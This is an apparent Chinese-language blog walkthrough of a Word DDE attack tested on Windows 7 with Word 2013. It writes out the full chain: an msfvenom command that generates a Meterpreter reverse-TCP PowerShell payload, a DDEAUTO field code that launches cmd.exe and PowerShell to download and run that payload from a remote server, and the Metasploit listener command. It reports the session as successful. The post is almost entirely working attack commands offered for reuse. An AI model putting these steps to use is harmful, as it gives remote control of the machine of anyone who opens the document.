标签:搭建 client system download bcd power load payload cmd
环境:
win7 64位,word2013
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1
?
放到VPS上,这里我们放到本机搭建的apache环境中
?
win7中访问木马是否成功
?
打开word2013,设置域ctrl+F9
?
写入代码:
DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.3.37/x.ps1‘) "
命令通过powershell执行下载了VPS的x.ps1
监听payload
msf5 > handler -H 192.168.64.135 -P 1122 -p windows/x64/meterpreter/reverse_tcp
?
打开word文件,点击是
?
在后台弹出cmd
监听成功
?
标签:搭建 client system download bcd power load payload cmd
原文地址:https://www.cnblogs.com/yyhuni/p/14550647.html